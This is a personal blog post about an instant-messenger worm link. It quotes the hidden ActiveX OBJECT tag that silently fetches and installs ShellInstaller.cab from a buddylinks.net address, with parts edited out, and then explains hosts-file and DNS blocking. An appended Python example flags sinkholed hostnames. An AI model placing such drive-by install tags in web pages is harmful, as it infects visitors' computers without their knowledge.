Today, K, a former co-worker of mine, messaged me out of the blue:
check this out... [some URL that I've edited out but had "osama capture" in the filename]
The last time I had heard from K was probably about two years ago, after I was laid off from Cox, so in my curiosity, I went ahead and clicked on the link and got a nondescript page.
And nothing happened.
You see, I'm running Linux at work, and those wonderfully magic things that happen when most people go to random web addresses don't always happen to me.
Which in this case would be a good thing.
See, later on, K would send me the following message:
if you get a link from me, don't click on it. it's some kind of virus
Given my natural programmer's curiosity, I went to the site with my text-based browser and found the following line:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="<some-junk>" CODEBASE="http:// [a buddylinks.net web address] /ShellInstaller.cab#Version=1,0,0,001">
Knowing what I know about Windows and its ilk, I figured that the fine folks at buddylinks.net have figured out how to automatically install and run an application from a webpage--an application which runs through your buddy list and sends every person on it a message.
It occurred to me that there would be a very nice and easy way of getting rid of said Internet jackasses. If you've ever installed Kazaa Lite, you might know that one of the things installed along with the program is a new Windows hosts file.
Most of the time, the internet has its own way of resolving internet addresses (it's called DNS). If your computer doesn't know what www.joewebsite.com is, it asks another computer if it knows, which can ask another, and so on, sort of like that shampoo commercial, but in a more organized and hierarchical fashion. The hosts file, however, is like a personal address book of internet IP addresses--ones which might not agree with what that big hierarchical system might provide.
Your average user will never care to use or even see what's going on in the hosts file. The reason Kazaa Lite installs a new one is that the kind folk who make the application have harvested a bunch of the addresses of the more annoying netizens--advertisers, popup purveyors, those kind of guys--and have pointed their addresses at your own.
How does this help? Well, unlike the U.S. Postal Service, the web works on a request basis. You tell your computer "give me google," and it finds google and downloads it. Advertisers sneak their messages in with the messages that you download, essentially piggybacking on things that you request--"hey, computer, while you're getting website A, go to website B and download other crap."
So the hosts file that Kazaa Lite installs has set most of the common "website Bs" around the world to your own address (127.0.0.1), which, if you're the average user, isn't running web server software and doesn't have advertisements. Your web browser tries to find the ad image or the pop up code, and when it fails, it just stops trying. It's like a little workaround for the popup ad problem, at least for that one ad on your computer.
How does this relate to an Instant Messenger virus?
The hosts file can pretty much eliminate a given offender from the internet for a single computer. Imagine, if you will, taking the domain name of a known virus purveyor (say, www.buddylinks.net), and entering it into the big hierarchical system as 127.0.0.1 or some other innocuous address. That replacement address would effectively blacklist the offending site for all the computers that trusted the DNS service of that portion of the hierarchy.
Granted, I'm neither a system administrator nor an expert in DNS, but given the proliferation of Internet assholes, I'm liking this idea more and more...
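The hosts-before-DNS lookup described above, as an added example in Python that is not part of the original post: it parses a hosts file, flags names pointed at loopback or 0.0.0.0, and shows that matching is by exact name only. The sample file is constructed (only www.buddylinks.net comes from the post), and the function names are this example's own.

```python
import ipaddress

# Constructed sample hosts file; only www.buddylinks.net is taken from the post.
SAMPLE_HOSTS = """\
# constructed sample, not a real blocklist
127.0.0.1   localhost
127.0.0.1   www.buddylinks.net    # sinkholed to this machine
0.0.0.0     ads.example.com popups.example.com
192.0.2.10  intranet.example.com  # ordinary override, not a block
"""

def _norm(name):
    # Hostnames are case-insensitive; a trailing dot is the same name.
    return name.lower().rstrip(".")

def parse_hosts(text):
    """Return {hostname: ip}. This example keeps the first entry for a name."""
    table = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue                            # blank line or address with no names
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # malformed address: skip the line
        for name in fields[1:]:
            table.setdefault(_norm(name), ip)
    return table

def is_sinkholed(name, ip):
    """Loopback or unspecified (0.0.0.0 / ::) target, except localhost itself."""
    return name != "localhost" and (ip.is_loopback or ip.is_unspecified)

def lookup(name, table):
    """Hosts file is consulted first, by exact name; no wildcard or suffix match."""
    key = _norm(name)
    ip = table.get(key)
    if ip is None:
        return ("dns", None)                    # not listed: the query goes to DNS
    return ("blocked" if is_sinkholed(key, ip) else "hosts", str(ip))

def blocked_names(table):
    return sorted(n for n, ip in table.items() if is_sinkholed(n, ip))
```

Here `lookup("buddylinks.net", ...)` falls through to DNS even though `www.buddylinks.net` is blocked, so a hosts-file block has to list every hostname a page actually loads from.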